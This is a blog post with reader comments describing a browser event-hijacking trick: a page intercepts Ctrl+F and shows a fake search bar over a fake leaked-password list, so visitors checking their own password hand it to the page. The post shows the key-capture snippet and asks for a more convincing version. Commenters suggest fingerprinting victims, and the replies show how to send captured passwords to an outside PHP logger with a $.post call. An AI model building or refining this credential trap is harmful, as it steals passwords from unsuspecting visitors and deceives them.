what's real and what's not

Some days back i read this post which is about Browser Event Hijacking, in my eyes a cool way to get some interesting information. I tried to rebuild it like the author did it back in the post but with a fake list of leaked passwords. So someone just presses CTRL+F in his browser and types his password to look if it is leaked. I think this is pretty normal behavior (I do it this way). But obviously this is not such a great idea.
           if((evt.which == "70" && ( evt.metaKey || evt.ctrlKey ))){  
                /* display fake search */
Not the browsers search bar will popup and wait for your input but a fake one will appear and steal all your search strings. This happens because of preventDefault() 
"Description: If this method is called, the default action of the event will not be triggered."
My goal was to build a fake search bar which automatically inserts your search string to the leaked password list and highlights it like the regular would do it. That wasn't pretty tough but even more so to display some good and legitimate looking search result stats. I gave up on that, the freaking stats are now just random. The code is awful, I'm not very proud of it. You can look at the result here. It would be so badass if someone would code it for all browsers and make it look 100% legit.
Once again you have to look carefully if you walk the intertubez. "What's real and what's not" sometimes even affects your browser itself.


  1. This comment has been removed by a blog administrator.

  2. Btw, you should insert some security-measures, as you are allowing XSS

  3. It would be nice if passwords were stored along with IP address, browser type and version, and screen resolution to make it easier to identify people who got cought.

  4. cheap?! .. yeah it is :D. Low hanging fruits ftw.

    uuups xss.

    yep, fringerprint of the browser would be nice.

  5. 1. xss is not as u dont use domain for sth else :P
    2. this does not work on epiphany 3.7

  6. find as you type might be an answer

  7. Do you Really need to use evt.preventDefault()?

    I think it can be done without it, so the search can be the native and also you can send the data to your server.

  8. How would you do that?
    As far as i know you cannot get the searchstring from the real search field. No keydown event will be fired in there.
    Doesn't work in the search field:

    document.addEventListener("keydown", function(e){

  9. Hey I'm really late but I hope you still read these.

    How do you send them to your mail? I see console.log("$$$: "+pass); but I don't understand it.

    Nice blog.

  10. hey... you can send it to e.g to a server side php script

  11. Ah cool. Thanks for your response. But I'm a total noob. I made the following. If I name it logger.php will it work?

    1. Didn't post the code.


    2. $.post('http:/blabla.blub/logger.php?log='+pass')
      php -> $subject = trim($REQUEST['log']);


      So like that?

      Or should that piece of code be inside the leaked.html. I'm so confused lol. I must be really annoying.

    4. lol...ääh nope..sorry but i cannot teach you how to program in js or php :D (use the force (google!1!))
      $.post(''+pass') is js instead of the console.log(.....blubblabla)
      replace the 6. line in the php script ($subject = trim($S_REQUEST['title']);;)
      with $subject = trim($REQUEST['log']);